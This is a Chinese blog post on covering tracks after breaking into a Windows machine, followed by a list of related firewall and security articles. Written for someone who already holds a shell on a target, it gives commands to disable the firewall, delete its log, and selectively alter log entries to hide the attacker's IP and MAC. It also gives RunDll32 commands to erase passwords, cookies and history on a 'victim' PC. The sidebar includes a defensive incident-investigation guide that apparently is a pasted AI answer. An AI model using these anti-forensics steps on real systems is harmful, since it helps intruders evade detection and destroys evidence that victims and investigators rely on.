入侵Windows以后,删除防火墙记录

最新推荐文章于 2025-01-06 20:08:34 发布
最新推荐文章于 2025-01-06 20:08:34 发布
阅读量177 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 操作系统 shell
原文链接:https://yq.aliyun.com/articles/628636
本文介绍了一系列在获取目标系统权限后的清理痕迹方法,包括清除防火墙记录、日志文件及浏览器历史等敏感信息,确保活动不易被追踪。
版权声明:转载请注明出处:http://blog.youkuaiyun.com/dajitui2024 https://blog.youkuaiyun.com/dajitui2024/article/details/79396294

1、参考文章

2、推荐关注领英

前提环境:我们已经拿到了目标的shell,现在准备清理防火墙记录的痕迹。

cd logfiles/firewall

观察防火墙的当前目录 
type pfirewall.log

读取防火墙日志 
Netsh firewall set opmode mode= DISABLE

关闭防火墙 
Del pfirewall.log

删除日志文件

type pfirewall.log

验证日志文件是否还在

注:这样是真的省事,可是少了大量日志记录,还是会被发现异常,所以删除带有自己访问记录的条目,或者修改日志内容是最好的选择。把自己的访问ip和,mac记录删除或者修改掉。

个人感觉,删除不是好的选择,你断开连接的时候,有的监管软件会记录你的离开,审核日志的时候,你有离开的记录,没有进入的记录,这就很让人怀疑了。

另:在远程受害者PC中删除Internet Explorer的密码/ Cookies /历史/临时Internet文件

参考文章

删除Internet临时文件
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 8

删除cookies
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 2

删除历史记录
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 1

从数据中删除
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 16

删除密码
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 32

删除所有
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 255

删除加载项存储的所有+文件和设置
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 4351
Windows操作系统进阶:防火墙基础和Windows Defender
m0_51456787的博客
07-31 2694
一、基本内容1、了解防火墙的基本内容2、掌握WindowsDefender图形化界面防火墙操作3、掌握WindowsDefender命令界面防火墙操作。
网络安全 | 下一代防火墙与下一代入侵防御系统的演变
热门推荐
优快云博客专家,系统架构师,有合作、疑惑请私信博主。
02-11 4万+
网络安全 | 下一代防火墙与下一代入侵防御系统的演变,本文深探讨了下一代防火墙(NGFW)与下一代入侵防御系统(NGIPS)的演变历程。随着网络技术的飞速发展和网络安全威胁的日益复杂,传统防火墙入侵防御系统已难以满足现代网络安全的需求。文章首先回顾了传统防火墙入侵防御系统的局限性,进而详细阐述了下一代防火墙与下一代入侵防御系统在功能特性上的显著扩展与创新,包括深度包检测与应用层控制、集成入侵检测与防御功能、智能化与自动化的安全决策、基于云的安全服务集成以及对新兴技术的支持等方面。同时,深分析了……
防火墙日志告警处理方法
qq_21612759的博客
03-11 2268
防火墙日志告警处理方法
防火墙入侵检测
开着奥迪卖小猪
06-30 2667
防火墙入侵检测】 防火墙:   防火墙是由软件、硬件构成的系统,是一种特殊编程的路由器,用来在两个网络之间实施接控制策略。接控制策略是由使用防火墙的单位自行制订的,为的是可以最适合本单位的需要。   防火墙内的网络称为“可信的网络”(trusted network),而将外部的因特网称为“不可信的网络”(untrusted network)。   防火墙可用来解决内联网和外联网的安全问题。
使用命令行操作Windows防火墙
skyyx2002的博客
06-30 5816
Windows防火墙功能远比IPsec强大得多,不仅可以限制IP、端口、协议,还可以对文件、网卡等进行限制
windows 安全系列06:启用windows防火墙允许记录日志
煜铭2011
07-02 1万+
0X00 前言 我们平时也可以使用类似的方法对windows访问网络进行日志记录。方便我们审查我们平时上网的日志。当然也可以对别人用自己的电脑进行上网时的留下的记录进行审核。 0x01 具体步骤 1 打开运行输 gpedit.msc 2 点击 计算机配置--- 管理模板 --- 网络 --- 网络连接 --- windows防火墙 -- 标准配置文件 3 在 标准配置文件 的右侧找到
Windows防火墙与端口管理
Kali与编程
01-31 2551
同时,需要及时更新软件和操作系统,使用加密协议,使用防火墙和端口扫描工具,并禁止远程访问,以及监控端口活动等措施来保护端口的安全性。通过学习如何设置和管理Windows防火墙规则,你可以提高你的计算机和网络的安全性,避免受到恶意软件或网络攻击的侵害。此外,你还可以使用其他安全工具,例如反病毒软件、反间谍软件和网络监视器等,进一步加强你的计算机和网络的安全性。尽管它可能需要一些学习和实践,但这是一项非常值得投资的任务,可以帮助你保护你的私人和商业数据,防范网络攻击和恶意软件的侵害。
【网络安全技术与应用】(选修)实验7 Windows内置防火墙配置
m0_73939014的博客
01-06 1239
测试二:(详见“测试与验证”补充说明)
828华为云征文|华为云Flexus X实例Windows Server 2019安装护卫神防火墙——为企业运维安全发挥重要作用!!!
withkai44的博客
09-25 1226
公司最近需要选购一台华为云Windows服务器部署产品应用,但是考虑到Windows的安全性至关重要。护卫神防火墙无疑是守护Windows系统安全的得力助手。华为云以其强大的性能和稳定的服务,为众多企业和开发者提供了可靠的云端基础设施。在网络环境日益复杂的情况下,护卫神防火墙就像是为服务器披上了一层坚固的铠甲。强大的入侵防护它能够实时监测服务器的网络流量,及时发现并阻止各种恶意攻击,如黑客入侵、DDoS 攻击等。
javascript清理IE内存
MCRSF_JINGUA的专栏
02-06 195
//清理浏览器内存,只对IE起效,FF不需要 [code="javascript"]if ($.browser.msie) { window.setInterval("CollectGarbage();", 10000); }[/code]
防火墙入侵监测
程序员杂谈
09-16 979
目前,最基本的网络分隔手段就是防火墙,它也是目前用来实现网络安全的一种主要措施。 1.防火墙的基本原理防火墙通常使用的采用包过滤、状态检测、应用网关等几种方式控制网络连接。 包过滤防火墙是一种简单而有效的安全控制技术,它根据在防火墙中预先定义的规则(允许或禁止与哪些源地址、目的地址、端口号有关的网络连接),对网络层和传输层的数据包进行检查,进而控制数据包的进出。 状态检测防火墙改进了包过滤防...
防火墙把自己服务器IP拉黑的解决办法
猿子
03-17 1万+
防火墙把自己服务器IP拉黑,导致有些资源不能正常使用,解决方法很简单,做个记录 在hosts文件中加 127.0.0.1 www.xxx.cn
如何清除windows入侵记录
刘书的IT博客
10-25 2267
安全日志    系统日志   DNS日志默认位置:%systemroot%system32config,默认文件大小512KB,管理员都会改变这个默认大小。安全日志文件:%systemroot%system32configSecEvent.EVT   系统日志文件:%systemroot%system32configSysEvent.EVT   应用程序日志文件:%systemroot%s
入侵防御之防火墙
写代码的小阿帆的博客
05-02 1295
#概述 **定义:**在两个网络之间执行访问控制策略的一个或一组安全系统,由计算机软、硬件设备组合而成。 作用: 1-保护内网中脆弱及存在安全漏洞的网络服务 2-实施安全策略,对网络通信进行访问控制 3-防止内网信息暴露 4-对内外网之间的通信进行监控审计 功能: 1-访问控制——最重要,网络安全策略 对经过防火墙的所有通信进行连通或阻断的安全控制 2-攻击防护 三层、四层攻击防护;五层功能不是很强 3-路由/交换 4-地址转换NAT 转换类型:源地址转换SNAT/目标地址转换DNAT 支持正向、反向地址转
清除入侵日志
herb8的博客
07-25 282
应用程序日志、安全日志、系统日志、 DNS日志默认位置:%systemroot%system32config,默认文件大小512KB,管理员都会改变这个默认大小。安全日志文件:%systemroot%system32configSecEvent.EVT系统日志文件:%systemroot%system32configSysEvent.EVT应用程序日志文件:%systemroot%system3...
防火墙入侵检测知识整理 (一)
安全汪
07-01 8380
最近整理点防火墙入侵检测系统的东西,记录在这里。 防火墙:是一种高级访问控制设备,置于不同的网络安全域之间的一些列部件的组合,它是不同网络安全域间通信流的唯一通道,能根据企业有关的安全策略控制(允许、拒绝、监视、记录)进出网络的访问行为。防火墙主要面临的安全威胁: 通过更改防火墙配置参数和其它相关安全数据而展开的攻击 攻击者利用高层协议和服务对内部受保护网络或主机进行的攻击 绕开身份认证和鉴别机制
windows入侵溯源排查思路
最新发布
06-04
<think>嗯,用户这次问的是Windows系统入侵溯源和排查的具体方法,看来是个网络安全领域的技术问题。从引用资料来看,用户已经收集了相当全面的参考信息,但需要更系统化的操作指南。用户可能是个系统管理员或安全运维人员,刚遭遇了入侵事件,语气中透着紧迫感。ta特意强调了“思路”和“方法”,说明不仅需要具体操作步骤,更想要建立完整的排查框架。有趣的是用户引用的材料中,引用[2]提到的“系统、服务、文件、网络”四象限分类法很有价值,这应该作为回答的主线。仔细看提供的参考资料:引用[1]是概述,引用[2]提出了理论框架,引用[3]含具体注册表和命令操作,引用[4]给出在线工具。我的回答需要把这些碎片整合成逻辑流:从入侵确认->系统层面排查->服务检查->文件分析->网络追踪,就像刑侦勘查现场的过程。特别要注意的是引用[3]里那些Windows特有指令,比如“at”命令查看计划任务这种容易被忽视的细节。另外必须强调证据保全,用户没提但引用[4]的在线扫描工具能补充本地查杀的不足。最后溯源部分要带出IP反查技巧,毕竟用户明确要求了“反向追踪”。安全类回答最怕给半吊子建议,所以每个操作项都要标注风险点,比如查看注册表前强调备份。那些带感叹号的警告标识不是吓唬人,上次看到有运维直接在生产环境跑删除命令结果触发蓝屏……用户此刻可能正面对被黑的服务器,容错率极低。对了,生成的问题清单要聚焦技术深化方向,像“EDR集成”这种企业级需求比单纯问工具更实用。毕竟会系统排查的人,多半需要服务整体解决方案。</think> 以下基于Windows系统入侵排查与溯源的标准流程,综合系统、服务、文件和网络四维度,整理具体操作思路与方法: --- ### **一、入侵确认与时间线重建** 1. **确定入侵时间范围** - 运行命令提示符: ```cmd systeminfo | findstr /B /C:"安装日期" /C:"启动时间" ``` 对比系统安装/启动时间异常记录。 - 检查事件日志(关键): ```cmd eventvwr.msc ``` 筛选 **安全日志(Event ID 4624/4625录事件)、系统日志(Event ID 1074关机事件)**,定位异常录时间点[^2][^3]。 --- ### **二、系统层面排查** #### 1. **用户与权限检查** - 查看新增/隐藏用户: ```cmd net user net localgroup administrators ``` 检查 `C:\Users\` 目录下异常用户文件夹。 - 注册表排查后门账号: ```reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users ``` **(操作前备份注册表)** #### 2. **自启动项分析** - 注册表检查: ``` HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ``` - 计划任务排查: ```cmd schtasks /query /fo LIST /v ``` 或通过图形界面:`taskschd.msc` #### 3. **服务与进程排查** - 服务管理: ```cmd services.msc ``` 重点观察 **"描述"空白、文件路径异常、自动启动**的服务。 - 进程分析工具: 使用 `Process Explorer` 或 `PowerShell命令`: ```powershell Get-Process | Format-Table Name, Id, Path -AutoSize ``` --- ### **三、文件与日志分析** #### 1. **关键文件检测** - 敏感目录扫描: ```cmd C:\Windows\Temp\ C:\Users\Public\ %APPDATA% ``` 查找非常规可执行文件(如`.exe`、`.dll`、`.vbs`)。 - 系统文件完整性校验: ```cmd sfc /scannow ``` 对比哈希值(使用 `certutil -hashfile <文件路径> SHA256`)。 #### 2. **日志深度审查** - **安全日志(Event ID 4688)**:记录进程创建,追踪恶意进程父进程。 - **DNS日志(Event ID 4661)**:分析异常域名解析请求。 --- ### **四、网络痕迹追踪** #### 1. **网络连接检测** - 查看活动连接: ```cmd netstat -ano | findstr ESTABLISHED ``` 定位可疑IP及端口(结合 `tasklist | findstr <PID>` 关联进程)。 - 防火墙日志分析: ``` %systemroot%\system32\logfiles\firewall\pfirewall.log ``` #### 2. **反向溯源准备** - 收集攻击者IP: 提取防火墙日志、Wireshark抓包或NetFlow数据。 - 关联威胁情报: 使用 **IP信誉查询**(如[Virustotal](https://www.virustotal.com/))、[X-Force Exchange](https://exchange.xforce.ibmcloud.com/))分析攻击源。 --- ### **五、证据固化与工具辅助** 1. **关键数据备份** - 导出内存镜像:使用 `WinPmem` 或 `Belkasoft RAM Capturer`。 - 磁盘全盘镜像:通过 `FTK Imager` 或 `dd` 工具。 2. **在线扫描可疑文件** - [VirScan](http://www.virscan.org/)(多引擎扫描) - [腾讯哈勃](https://habo.qq.com/)(深度行为分析) --- ### **排查流程图** ```mermaid graph TD A[发现入侵迹象] --> B{时间线重建} B --> C[系统层面排查] B --> D[文件层面排查] C --> E[用户/服务/启动项] D --> F[敏感文件/日志] E & F --> G[网络连接分析] G --> H[提取攻击IP/域名] H --> I[威胁情报关联] I --> J[溯源报告] ``` > **注**:所有高风险操作前需创建系统快照,避免取证污染。企业环境建议结合EDR(端点检测响应)工具自动化监控[^4]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值